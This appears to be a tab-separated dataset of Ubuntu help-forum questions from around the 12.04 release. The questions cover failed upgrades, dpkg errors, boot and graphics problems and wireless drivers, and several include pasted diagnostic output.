125479	updater messed up	i upgraded from 8.04 to 11.10 on my old compaq presario . surprisingly , everything went smoothly and worked . then the dreaded update module decided that there were 300+ items that needed to be installed . did n't get past one or two then crapped out . ever since then when i try to run the updater , i get an error message that i can either close the updater or try a partial install . partial install says to run : gordon @ presario-ubuntu : ~ $ sudo apt-get install -f [ sudo ] password for gordon : this did n't do too well and got the following error msg : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . so i tried it and got the following : gordon @ presario-ubuntu : ~ $ sudo dpkg -- configure -a dpkg : error : parsing file '/var/lib/dpkg/updates/0000 ' near line 22 package 'cups-ppdc ' : eof after field name `' gordon @ presario-ubuntu : ~ $ i 'm no genius at this kind of stuff , so do n't know where to proceed from here . perhaps i should try and install 12.04 from a cd and see if it will upgrade and repair this problem . and thoughts , suggestions , help would be greatly appreciated . please remember tht i 'm kind of illiterate in the world of linux and its relatives . thanks by the way , i can not install any programs either - just error out .
125487	upgrading from 12.04 beta 2 to stable 12.04	how to upgrade from beta 2 release of 12.04 to stable release of 12.04 ? do i need to create a new installing disk for upgrading , or can i update it via apt ? ( and yes , i know that upgrading via apt is not recommended ) update manager did n't say anything about upgrading to 12.04 , so i tried sudo apt-get dist-upgrade , but it did n't work either .
125493	how can i avoid the black screen on boot with gma500 graphics ?	ubuntu 12.04 was released today , but it still ca n't boot normally with gma500 graphics : ( . it 's a black screen and i need to go into text mode via ctrl-alt-f1 and restart desktop manager via `` sudo service lightdm restart '' . is it any way to avoid this restarts every time os boots ?
125494	ca n't boot without flash drive plugged in	i had ubuntu 12.04 beta installed on my computer . when 12.04 was finally released , i made a bootable usb flash drive using startup disk creator . then i decided to check if this drive works properly and to reinstall the system on my desktop . i must add , my desktop behaves a bit strange when it comes to bootable usb 's , it recognizes them as hdd . in bios i changed priority of boot so usb flash drive ( recognized as hdd ) was first . successfully booted , i installed ubuntu . everything worked fine , but ... now i can not boot from my real hdd . every time i want to boot , i put the usb flash drive into my computer , boot , safely remove it and everything works . what do i need to do to repair boot ?
125495	`` /casper/linuz : file not found '' ? when trying to boot off the cd	i 'm trying to install 12.04 amd64 , but none of the options work . when the cd runs , the options to run , install , and check disk for defects give the following error : `` /casper/vmlinuz : file not found '' . i 've already checked the iso with md5sum . any help would be greatly appreciated .
125500	upgrade to 12.04 failed due to held back packages	i run upgrade after installing all recommended updates from update manager , and i got dialog : could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade : e : unable to correct problems , you have held broken packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug update-manager ' in a terminal . so i reported bug . i also tried umpirsky @ umpirsky : ~ $ sudo apt-get update ... fetched 16.6 kb in 1min 22s ( 200 b/s ) reading package lists ... done w : gpg error : http : //archive.canonical.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < email address hidden > any workaround for this ? what is the easiest way to resolve apt-get badsig gpg errors ? first and second solution did n't work , last one returned cd : /var/cache/apt-cacher-ng : no such file or directory . still getting gpg error .
125503	install through usb stick macbook pro	i 've just downloaded ubuntu 12.04 and wanted to make a fresh install on my macbook pro , i followed the instructions given here http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx and when the operations are completed i get this result : the disk you inserted was not readable by this computer obviously , when i restart the pc , it can not find any bootable device . note i 've tried using lion osx thank you very much for your help !
125506	bluetooth ( atheros ar5bbu22 ) not working	bluetooth ca n't see devices . in windows 7 working properly . ubuntu 12.04 and 11.10 lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 1bcf:288a sunplus innovation technology inc . bus 001 device 004 : id 0489 : e03c foxconn / hon hai bus 002 device 003 : id 046d : c52b logitech , inc. unifying receiver hciconfig hci0 : type : br/edr bus : usb bd address : 94:39 : e5:4e : fa:3a acl mtu : 1022:8 sco mtu : 183:5 up running pscan iscan rx bytes:1559 acl:0 sco:0 events:104 errors:0 tx bytes:926 acl:0 sco:0 commands:81 errors:0 lsmod module size used by bbswitch 13355 0 rfcomm 47604 12 bnep 18281 2 parport_pc 32866 0 ppdev 17113 0 binfmt_misc 17540 1 snd_hda_codec_hdmi 32474 1 snd_hda_codec_conexant 62128 1 snd_hda_intel 33773 3 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel joydev 17693 0 snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 uvcvideo 72627 0 videodev 98259 1 uvcvideo hid_logitech_dj 18593 0 snd_rawmidi 30748 1 snd_seq_midi usbhid 47199 1 hid_logitech_dj hid 99559 2 hid_logitech_dj , usbhid arc4 12529 2 v4l2_compat_ioctl32 17128 1 videodev snd_seq_midi_event 14899 1 snd_seq_midi ath9k 132390 0 mac80211 506816 1 ath9k ath9k_common 14053 1 ath9k snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event ath9k_hw 411112 2 ath9k , ath9k_common snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq i915 468651 3 psmouse 87603 0 snd 78855 16 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device ath 24067 3 ath9k , ath9k_common , ath9k_hw cfg80211 205544 3 ath9k , mac80211 , ath drm_kms_helper 46978 1 i915 drm 242038 4 i915 , drm_kms_helper btusb 18288 2 mac_hid 13253 0 bluetooth 180104 23 rfcomm , bnep , btusb soundcore 15091 1 snd acer_wmi 28418 0 mxm_wmi 12979 0 snd_page_alloc 18529 2 snd_hda_intel , snd_pcm i2c_algo_bit 13423 1 i915 sparse_keymap 13890 1 acer_wmi serio_raw 13211 0 rts_pstor 445196 0 mei 41616 0 wmi 19256 2 acer_wmi , mxm_wmi video 19596 1 i915 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp atl1c 41717 0 uname -a linux laptop 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux dmesg | grep bluetooth [ 7.642818 ] bluetooth : core ver 2.16 [ 7.642839 ] bluetooth : hci device and connection manager initialized [ 7.642841 ] bluetooth : hci socket layer initialized [ 7.642842 ] bluetooth : l2cap socket layer initialized [ 7.642847 ] bluetooth : sco socket layer initialized [ 7.700557 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 15.498797 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 15.498800 ] bluetooth : bnep filters : protocol multicast [ 15.524883 ] bluetooth : rfcomm tty layer initialized [ 15.524888 ] bluetooth : rfcomm socket layer initialized [ 15.524890 ] bluetooth : rfcomm ver 1.11
125508	unrecognized video card `` intel hd graphics '' ... help ?	i installed the new version of ubuntu 12.04 lts . download and install the 32 bit ( it automatically installed the pae kernel ) i notice the problem arises when small accents and i 'll see the `` details '' the system tells me `` graphics : unknown '' and tried to find anything but neither jockey my video card is `` intel hd graphics '' and my machine is a lenovo g460l with intel core i3 micro and 4gb of ram . as i can solve the problem ? i need to use 64-bit ? image of problem : thanks , yours sincerely juan pablo lozano
125509	my screen goes black ( that is back lights goes off ) when tried to install ubuntu 11.04 or greater versions like 12.04	my screen goes black ( that is back lights goes off ) when tried to install ubuntu 11.04 or greater versions like 12.04 .please help me out on this issue .
125512	ca n't upgrade with cdromupgrade	i am try to upgrade to 12.04 from 11.10 using alternative cd . i run this command sudo gksu `` sh /media/iso/cdromupgrade '' after mounted iso as cd . its gives this error `` an upgrade from 'oneric ' to 'precise ' ''
125513	choppy video in vlc even with hardware acceleration on ati radeon hd 6900	after installing catalyst 11.12 and studying instructions ( 1 , 2 ) to enable hardware acceleration i ended up with the following command : sudo apt-get install xvba-va-driver libva-glx1 vainfo & & \ vainfo & & \ vlc -- verbose 2 -- ffmpeg-hw video.1080p.x264.mkv the output confirms that it 's using the va api : avcodec decoder : using va api version 0.32 for hardware decoding . but even after a reboot the video still looks choppy . there 's no vlc output to indicate that the codec is having trouble , or that it 's skipping frames . any idea what could be the problem ? using vlc 1.1.12 with default settings . also tried ( in sequence ) : sudo apt-get install libva-glx1 sudo apt-get install -- reinstall libgl1-mesa-glx : i386 libgl1-mesa-glx : amd64 libgl1-mesa-dri : i386 libgl1-mesa-dri : amd64 xserver-xorg-core rebooting no luck yet . specs from /proc/cpuinfo : intel core i7 cpu 950 @ 3.07ghz
125520	ubuntu 12.04 startup after installation needs usb	i just installed ubuntu 12.04 from a bootable usb ( created in ubuntu itself ) . everything was fine with installation , but after installation , i need to plugin the usb to start-up . ubuntu does not read from the usb ( just a tiny activity at startup ) , but without the usb attached , ubuntu will not be started . black screen frozen by _ sign . i think something for independent start-up has not been correctly copied
125521	upgrade from ubuntu 10.04 lts to 12.04 lts errors	when using update-manager -d , sudo do-release-upgrade , or using the gui , i get several errors . the first being update-manager -d brings up the update manager just fine , shows the upgrade option just fine , but when i click on upgrade , i get the `` beta version '' that shows up . then the remaining errors involve adobeflashplugin and adobe-flash-propertiesgtk , which are uninstalled , but the upgrader insists they 're causing an error . i 've tried this but it does n't work : error authenticating some adobe packages , how to proceed ? also , i downloaded the iso via torrent from ubuntu site , the md5s check out , and using unetbootin and burning iso to disc , i do not get an upgrade option at all . i get the options to install 12.04 along side , erase the partitions , or something else . my update manager is set for lts releases only . i 've also disabled extra sources ( medibuntu , for example ) . not sure if i 'm doing something wrong or not . i 've tried this but it does n't work : '' no new release found '' when upgrading a from 10.04 lts to 12.04 lts using 32bit 10.04 , trying to upgrade to 32bit 12.04 , on an acer aspire one netbook ( d250 model ) . any help would be appreciated and thanks in advance .
125522	`` none-type '' error on wubi after md5hash check fails	c29be6d58c1581d9cd679aca25db77d1 ubuntu-12.04-desktop-amd64.metalink c7a6b99206703cfe37f1da5af1d28e3a ubuntu-12.04-desktop-i386.metalink 4e44ca9bc7ee8ab54ff9565a5437bdc2 ubuntu-12.04-server-amd64.metalink c9cfc1dd8c65099d929189eedc157f3c ubuntu-12.04-server-i386.metalink 04-26 20:10 debug tasklist : # # # # finished get_metalink 04-26 20:10 debug tasklist : new task get_file_md5 04-26 20:10 debug tasklist : # # # # running get_file_md5 ... 04-26 20:10 debug tasklist : # # # # finished get_file_md5 04-26 20:10 error commonbackend : invalid md5 for iso c : \ubuntu\install\installation.iso ( d791352694374f1c478779f7f4447a3f ! = 866bdfa347b5425b18fdafe719a956df ) none 04-26 20:10 debug tasklist : # # # finished check_iso 04-26 20:10 error tasklist : 'nonetype ' object has no attribute 'get_info' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 564 , in use_cd attributeerror : 'nonetype ' object has no attribute 'get_info' 04-26 20:10 debug tasklist : # cancelling tasklist 04-26 20:10 error root : 'nonetype ' object has no attribute 'get_info' traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 564 , in use_cd attributeerror : 'nonetype ' object has no attribute 'get_info' 04-26 20:10 debug tasklist : # finished tasklist
125524	wine libasound2 file conflict in 12.04 wine 1.5/1.4 64bit	when attempting to install wine/playonlinux on 64bit 12.04 , i come across this error when installing 'libasound:1386 ' . ( reading database ... 153318 files and directories currently installed . ) unpacking libasound2 : i386 ( from ... /libasound2_1.0.25-1ubuntu10_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libasound2_1.0.25-1ubuntu10_i386.deb unpack ) : './usr/share/alsa/pcm/surround71.conf ' is different from the same file on the system is there any way of fixing this ? thanks !
125526	vim in tmux display wrong colors	i installed ubuntu 11.10 . then downloaded solarized theme for gnome terminal . from terminal my vim looks good : plugin vim-powerline displays correctly and syntax is highlighted with proper colors . but when i run tmux and there run vim - syntax highlight uses only one basic color and vim-powerline displays no colors . i looked at the faq on vim-powerline and solution should be this line in .tmux-config : set -g default-terminal `` screen-256color '' but it does n't work . i looked at term and it 's return 'xterm ' so i tried : set -g default-terminal `` xterm-256color '' but this also dose n't help . this is the only line in .tmux.config . in .vimrc i have following lines : call pathogen # infect ( ) set nocompatible set encoding=utf-8 set laststatus=2 let g : powerline_symbols = 'fancy' set t_co=256 syntax enable set background=dark colorsheme solarized
125527	ubuntu wo n't boot after 12.04 upgrade , timidity++ error	so i upgraded to 12.04 this afternoon from 11.10 . however when i boot into ubuntu , after the loading screen has hung for about 15 seconds , it then disappears and a black screen appears and appears to stall at the action 'timidity++ alsa midi emulation [ ok ] ' . i 've looked it up for a while now and there has been a few reports of it but no one seems to ever come to a solution and ends up doing a fresh install . this is n't an option for me . it 's clearly a timidity error so even if i could temporarily bypass this and uninstall it , that 'd be great .
125529	wireless does n't work on a broadcom bcm4312	as stated , i 've just upgraded to 12.04 and my dell inspiron 1545 is n't recognising its wireless card and i was wondering if anybody could help ? edit : okay , so i found the wireless card by using lspci -vvv and it returned this : 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- kernel modules : ssb lsmod module size used by dm_crypt 22528 0 joydev 17393 0 dell_wmi 12601 0 sparse_keymap 13658 1 dell_wmi dell_laptop 13671 0 dcdbas 14098 1 dell_laptop psmouse 72919 0 uvcvideo 67203 0 serio_raw 13027 0 videodev 86588 1 uvcvideo snd_hda_codec_idt 60251 1 mac_hid 13077 0 snd_hda_intel 32765 5 snd_hda_codec 109562 2 snd_hda_codec_idt , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec parport_pc 32114 0 rfcomm 38139 0 bnep 17830 2 ppdev 12849 0 snd_pcm 80845 3 snd_hda_intel , snd_hda_codec bluetooth 158438 10 rfcomm , bnep snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq binfmt_misc 17292 1 snd 62064 18 snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm lp 17455 0 parport 40930 3 parport_pc , ppdev , lp sky2 53628 0 ums_realtek 17920 0 uas 17699 0 i915 414603 3 wmi 18744 1 dell_wmi drm_kms_helper 45466 1 i915 drm 197692 4 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 video 19068 1 i915 usb_storage 39646 1 ums_realtek ifconfig -a eth0 link encap : ethernet hwaddr 00:23 : ae:24:71:45 inet addr:192.168.1.158 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :223 : aeff : fe24:7145/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14340 errors:0 dropped:0 overruns:0 frame:0 tx packets:10191 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:15403754 ( 15.4 mb ) tx bytes:1262570 ( 1.2 mb ) interrupt:18 ham0 link encap : ethernet hwaddr 7a:79:05:2d : b0 : f7 inet addr:5.45.176.247 bcast:5.255.255.255 mask:255.0.0.0 inet6 addr : fe80 : :7879:5ff : fe2d : b0f7/64 scope : link inet6 addr : 2620:9b : :52d : b0f7/96 scope : global up broadcast running multicast mtu:1404 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:179 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:0 ( 0.0 b ) tx bytes:27480 ( 27.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:433 errors:0 dropped:0 overruns:0 frame:0 tx packets:433 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:60051 ( 60.0 kb ) tx bytes:60051 ( 60.0 kb ) iwconfig lo no wireless extensions . ham0 no wireless extensions . eth0 no wireless extensions . the results for sudo lshw -class network *-network description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : eth1 version : 01 serial : 00:22:5f:77:1f : e6 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 latency=0 multicast=yes wireless=ieee 802.11bg resources : irq:17 memory : f69fc000-f69fffff *-network description : ethernet interface product : 88e8040 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 13 serial : 00:23 : ae:24:71:45 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full firmware=n/a ip=192.168.1.158 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:45 memory : f68fc000-f68fffff ioport : de00 ( size=256 ) *-network description : ethernet interface physical id : 2 logical name : ham0 serial : 7a:79:05:2d : b0 : f7 size : 10mbit/s capabilities : ethernet physical configuration : autonegotiation=off broadcast=yes driver=tun driverversion=1.6 duplex=full firmware=n/a ip=5.45.176.247 link=yes multicast=yes port=twisted pair speed=10mbit/s and the results of rfkill list all 0 : brcmwl-0 : wireless lan soft blocked : yes hard blocked : yes 1 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes
125531	wireless connection with a centrino wireless-n 1000 wo n't last longer than 20 seconds	my laptop is a lenovo sl510 . it will ask me for my network key and after inputting it , it will drop after about 20 seconds , and ask for the key again , and continuously do this . i never had any connection problems up until trying 12.04 today . $ dmesg | grep -i firmware [ 0.169851 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored [ 18.203838 ] thinkpad_acpi : asked for hotkey mask 0x078dffff , but firmware forced it to 0x008dffff [ 18.637527 ] iwlwifi 0000:05:00.0 : loaded firmware version 39.31.5.1 build 35138 [ 28.202028 ] ibm trackpoint firmware : 0x0e , buttons : 3/3 $ lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 ide interface : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 2 port sata controller [ ide mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 02:00.0 system peripheral : jmicron technology corp. sd/mmc host controller 02:00.2 sd host controller : jmicron technology corp. standard sd host controller 02:00.3 system peripheral : jmicron technology corp. ms host controller 02:00.4 system peripheral : jmicron technology corp. xd host controller 05:00.0 network controller : intel corporation centrino wireless-n 1000 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) $ sudo lshw -class network pci ( sysfs ) *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 00 serial : 00:26 : c7:21 : ed : da width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-23-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:49 memory : f2200000-f2201fff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 03 serial : c8:0a : a9:24 : c4:56 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168d-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:46 ioport:3000 ( size=256 ) memory : f2004000-f2004fff memory : f2000000-f2003fff memory : f2020000-f203ffff $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no how do i solve this ?
125532	is there an amarok scope for the music lens ?	i 'm searching for an amarok scope for the music lens for a while now but could not find anything , not even a project . anybody got something working ? i use amarok as i love the dynamic play lists and so on , rhythmbox or clementine is nowhere near .
125533	did the new login sound not make it into 12.04 ?	running 12.04 for the first time today , i still have the old login sound . ( well , technically i do n't have any login sound at all , oddly . nothing in startup apps for it . when i do a file search for gnome login , i find a sound file for it but it 's the old sound . ) i was looking forward to the new sound , are there still plans to implement it ?
125536	what happens to gnome shell when i upgrade to 12.04 ?	what happens to my gnome shell session if i upgrade to ubuntu 12.04 , i removed unity . and gnome has many extensions and modifications via ppa etc . so , what happens if i choose to upgrade ? i supose that unity will be installed , no problem whith that , but how this affects gnome shell ?
125537	nvidia graphics - resolution problems with new 12.04 lts installation	i 've been trying to install ubuntu 12.04 lts on my desktop most of the day . the desktop uses a nvidia geforce 9800 ( gt i think ) graphics card . i am unable to set the correct resolution ( 1680 x 1050 ) for the display . the first problem i had was that of the `` black screen '' during install . i overcame this by utilising the `` nomodeset '' switch on the install options ( once i 'd found how to do that ) . the second problem of course was the `` black screen '' following the first reboot . once again this was overcome by using `` nomodeset '' , this time by `` editing '' the grub . this gave me a resolution of 1280x768 which , the displays gui allowed me to change to 1280x720 ( appears to fit on screen ) . i then tried to install the nvidia drivers . 1 ) using additional drivers 2 ) manually by downloading driver and installing in root as soon as nvidia drivers are installed - resolution become restricted to 640x480 ( max ) . at this resolution ubuntu gui is not usable as most screens are larger than the display . removing the nvidia driver and removing the xorg.conf file does not lift this restriction . i have tried most things that i have found and that were vaguely intelligible , but nothing appears to get me closer to a resolution of 1680x1050 . update : reinstalled ubuntu 12-04 and used the `` nomodeset '' in the grub to restore the resolution to 1280x720 , which is at least usable . will live with this for now .
125539	ubuntu or xubuntu for old pc with p4 2.8ghz , 2gb ram ?	what should i install on an older pc with a pentium 4 2.8 ghz processor and 2gb ram ? ubuntu 12.04 or xubuntu 12.04 ? or lets ask : would xubuntu run much smoother than ubuntu on this old computer ?
125541	ubuntu 12.04 md5 does n't match	i downloaded ubuntu desktop i386 12.04 from http : //na.mirror.garr.it/mirrors/ubuntu-releases/ and the md5 does not check . i know there have been some troubles with md5 just after release , so i was wondering if everything is ok now and i just need to re-download the iso ; ) thanks a lot ; )
125542	how to change keyboard type ?	there was an option in older versions of ubuntu to select type of your keyboard â for example pc105 , apple , etc . now i am using ubuntu 12.04 and logitech illuminated keyboard . the thing is that winkey here is a level 3 shift and left control key is mod2+control l. i want to return correct values for this buttons . can someone help me with this issue ? thanks .
125548	xubuntu 12.4 upgraded fine but there are everywhere pale grey windows/menus with white fonts !	i upgraded to xubuntu 12.4 through the update manager . everything works fine except that many windows and menus ( ubuntu software center , transmission properties etc ) apear in pale grey with white fonts . for examle , it 's impossible to read n change properties on transmission . titles apear excellently , the rest is really hard to read : white text on allmost white background ... i have tried already : rebooting , changing theme/apearance photo1 http : //en.zimagez.com/zimage/-26042012-102025.php when login as guest everything works fine . i created a new account , all is fine photo2 http : //en.zimagez.com/zimage/-26042012-103258.php but i still want my initiall user-account which i had so well tuned ...
125553	ubuntu 12.04 your system is running low-graphics mode	i installed today ubuntu 12.04 . i works fine when i am running from cd-rom . when i try to install it it installs ok , but when trying to restart the computer without cd-rom it shows `` your system is running in low-graphics mode , your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . '' and actually when you push these buttons it still wo n't start normally . only way to get it working is from cd-rom . any help for this ?
125554	add icon to unity panel during/after package installation	intro : i am currently creating a custom ubuntu iso for an appliance i am creating . all work on the development of this iso is done in a chroot , so there is no graphical environment . what i would like to do is when my client package is installed , have it add an icon/launcher to the unity panel ( on the left ) so the end user does n't have to do this manually . i have looked all over my chroot to find out where the default apps are located and have been unsuccessful . for instance , after installing ubuntu , the first time i log in there are a set of default icons in the unity bar ( on the left ) . how do i get my package/application to add one there automatically ?
125556	any software and ubuntu ca n't conect to internet ( i leave my output , but in portuguese ... )	this is what happens when i do `` sudo apt-get update '' ... : s and it is not the temporary error , as far as i understood ... i tried everything ... algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-backports/universe translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/main translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/main translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/main translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/main translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/multiverse translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/multiverse translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/multiverse translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/multiverse translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/restricted translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/restricted translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/restricted translation-pt_br algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/restricted translation-en algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/universe translation-pt_pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 ' ( -5 - não existe um endereço associado ao nome de servidor ) err http : //pt.archive.ubuntu.com precise-security/universe translation-pt algo estranho aconteceu ao resolver 'proxy.e-u:8080 